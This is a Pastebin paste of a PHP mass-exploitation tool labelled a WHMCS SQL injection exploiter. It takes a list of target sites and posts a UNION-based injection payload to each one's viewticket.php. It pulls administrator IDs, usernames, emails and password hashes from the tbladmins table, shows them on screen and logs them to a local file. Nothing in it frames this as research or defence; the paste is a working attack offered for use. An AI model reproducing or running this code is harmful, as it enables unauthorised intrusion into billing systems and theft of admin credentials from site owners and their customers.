Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <center><a href="#" class="button"><font size="5" color="#A7CCCB"> whmcs sql injection exploiter by hamza killer</font></a> <br>
- </font><br><br><br></center>
- <center><form method="post">
- <textarea cols="50" name="site" rows="20"> </textarea>
- <br>
- <input type="submit" name="go" value="exploit" />
- </form>
- </center>
- <style>
- .button {
- background-color:#3399FF;
- background-image: -moz-linear-gradient(center top , #3BA4C7 0%, #1982A5 100%);
- border: 1px solid #004F72;
- border-radius: 4px 4px 4px 4px;
- box-shadow: 0 0 2px #BABABA, 0 0 1px #FFFFFF inset;
- color: #E5FFFF;
- font: bold 12px Tahoma,Helvetica,sans-serif;
- padding: 30px;
- text-align: center;
- text-decoration: none;
- }input[type="text"], input[type="password"], input[type="file"], select, textarea {
- border: 1px solid #969696;
- padding: 7px 12px;
- }</style>
- <style>
- input[type="button"], input[type="reset"], input[type="submit"] {
- border: 1px solid #000000;
- cursor: pointer;
- font-size: 11px;
- margin-top: 2px;
- padding: 8px 24px;
- }
- center {
- text-align: -webkit-center;
- }
- body{
- /* font-family : Verdana; */
- color : #990000;
- font-size : 14px;
- font-family:tahoma;
- background-color: ;
- background-image: url('http://i.imgur.com/zHNCk2e.gif')
- color: #990000;
- font: 9pt Lucida,Verdana;
- margin: 0;
- vertical-align: top;
- color: #e1e1e1;
- }
- </style>
- <center>
- <?
- /*
- to b0x
- */
- set_time_limit(0);
- error_reporting(0);
- @apache_setenv('no-gzip', 1);
- @ini_set('zlib.output_compression', 0);
- @ini_set('implicit_flush', 1);
- for($i=0;$i<= ob_get_level(); $i++)
- {
- ob_end_flush();
- }
- ob_implicit_flush(1);
- $fp=fopen("hamza.txt","a+");
- $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
- if($_POST['go'])
- {
- $sites=explode("\n",$_POST['site']);
- foreach($sites as $si)
- {
- $site=trim($si);
- $url = "$site/viewticket.php";
- $sh = curl_init($url);
- curl_setopt($sh, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
- curl_setopt($sh, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($sh, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($sh, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($sh, CURLOPT_POSTFIELDS,$post);
- $ex = curl_exec($sh);
- $sa=preg_match_all("/:::::(.*?):::::/s",$ex,$dat);
- if($sa){
- echo"<center><font color='#006600' size='3'>succeed<br>--------------------------------------<br>$url<br>--------------------------------------</font>";
- foreach($dat[1] as $data)
- {
- echo"<br><center><font color='#006600' size='3'><br>$data<br></font><center>";
- @fwrite($fp,"\n\n-------$url----\n$data\n\n-------");
- }
- }else{
- echo"<br><center><font size='2' color='#990000'> $url => faild</font><br><br><br><center>";
- }
- }
- @fclose($fp);
- }
- ?>
- to :<font color="#3366FF">linux-dz</font> -<font color="#3366FF">virus duba</font>- <font color="#3366FF">Lapoca DZ</font></font></font></p></form></body>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement